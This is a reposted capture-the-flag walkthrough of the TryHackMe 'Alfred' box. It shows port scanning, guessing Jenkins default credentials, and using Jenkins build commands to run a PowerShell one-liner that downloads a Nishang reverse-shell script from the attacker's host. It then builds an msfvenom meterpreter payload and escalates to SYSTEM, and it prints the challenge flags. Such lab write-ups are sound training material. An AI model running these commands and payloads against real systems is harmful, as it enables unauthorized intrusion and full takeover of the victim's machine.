TryHackMe Alfred – How I Solved The Challenge : Benjamin Reitz
by: Benjamin Reitz
blow post content copied from Finxter
click here to view original post
In this Capture the Flag (CTF) challenge walkthrough, I’ll hack into a windows service called Jenkins, find a way to carry out Remote Command Execution (RCE) by using Metasploit to gain access to the box and escalate my privileges to the NT AUTHORITY/SYSTEM, which is the equivalent of root on a Windows machine.
Challenge: I need to capture two “flags”, the user.txt flag and the root.txt flag. Let’s get started!
First, we’ll note down our IP addresses, export them, and run our nmap scan with the flag -Pn to skip host discovery.
INITIAL ENUMERATION
IPs export myIP=10.6.2.23 export targetIP=10.10.99.176 ┌──(tester㉿box)-[~/THM] └─$ nmap 10.10.216.90 -Pn Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 22:39 EST Nmap scan report for 10.10.216.90 Host is up (0.083s latency). Not shown: 997 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 3389/tcp open ms-wbt-server 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds
We see that there are three open ports.
There is an HTTP service running on port 80. That is presumably a website that we will look at in a moment on our browser.
The ms-wbt-server running on port 3389 looks interesting. A quick google search reveals that it has something to do with the RDP (remote desktop protocol).
Also, the http-proxy on 8080 looks intriguing. On port 80 we find a picture of batman in plainclothes. There’s not much here to see. A quick look at the source HTML code doesn’t reveal anything else interesting.
HACKING JENKINS WITH BURPSUITE
On port 8080, we find a login page to Jenkins.
Let’s take a few guesses with some of the standard factory-set passwords: admin:password, admin:admin, etc.
Using the proxy intercept and sending it to the intruder function, we can set up a list of passwords and usernames to try as a sniper-style attack.
Based on the different lengths of the responses, we can see that admin:admin may be our winning combination. We are in luck that this company has lazy administrators who don’t properly safeguard their business! The system lets us in as expected with admin:admin.
At TryHackMe’s suggestion, we’ll use Nishang for spawning a revshell from windows. Inside the Jenkins admin dashboard, we can click on project 1 and then edit configure.
In the last text box, we can perform remote command execution.
USING REMOTE COMMAND EXECUTION TO SPAWN A REVSHELL PAYLOAD
First, let’s spawn a reverse shell using PowerShellTcp.ps1 from nishang’s git repo. After downloading the file from the git repo, we launch a Netcat listener with the command:
nc -lnvp 8888
Then we use the following command in the last text box on Jenkins project 1 settings.
powershell iex (New-Object Net.WebClient).DownloadString('http://10.6.2.23:8000/Invoke-PowerShellTcp.ps1'>
After clicking on “build” in the Jenkin’s dashboard, we catch the shell on our Netcat listener and discover the user.txt flag!
!!!
user.txt:
79007a09481963edf2e1321abd9ae2a0
!!!
USING MSFVENOM TO CREATE A MALICIOUS PAYLOAD
We can create a custom malicious payload to enable us to connect to a more powerful reverse shell within Metasploit using the following command in our attack box:
sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 – encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=4444 -f exe -o shell.exe
Now we need to start up Metasploit console:
Msfconsole
Load the meterpreter exploit/multi/handler:
use exploit/multi/handler
Set up our payload:
set payload windows/meterpreter/reverse_tcp payload
And finally, type: run
First, we’ll spin up a simple HTTP server to copy shell.exe to windows with:
python -m http.server 8000
Then we can copy and run the file on the target machine by again using remote command execution via the Jenkins edit build function:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.6.2.23:8000/shell.exe','shell.exe')"
And Metasploit successfully launches a new meterpreter session on the target box. If the shell.exe file is grabbed successfully from the HTTP server (code 200), but no meterpreter shell is spawned, we can use one more Jenkins RCE to run the revshell:
./shell.exe
PRIVILEGE ESCALATION TO ROOT
First, we issue the following command in our meterpreter to automatically escalate to the highest privilege possible:
getsystem
We now operate with NT AUTHORITY/SYSTEM privileges for most things, but not every single command. To fix this, we can migrate to another process on the target machine.
Entering the command “ps” will give us a list of processes. We’ll use the process system.exe with the following command:
migrate <PID> (process id of the target process running by NT AUTHORITY/SYSTEM, in this case system.exe)
Now we are running metasploit in the RAM of our target machine on the system.exe process. We have full NT AUTHORITY/SYSTEM privileges and can easily find root.txt with the following command:
find -f root.txt cat root.txt ��dff0f748678f280250f25a45b8046b4a
Thanks for reading/watching my walkthrough. 
December 25, 2022 at 04:05PM
Click here for more details...
=============================
The original post is available in Finxter by Benjamin Reitz
this post has been published as it is through automation. Automation script brings all the top bloggers post under a single umbrella.
The purpose of this blog, Follow the top Salesforce bloggers and collect all blogs in a single place through automation.
============================
Post a Comment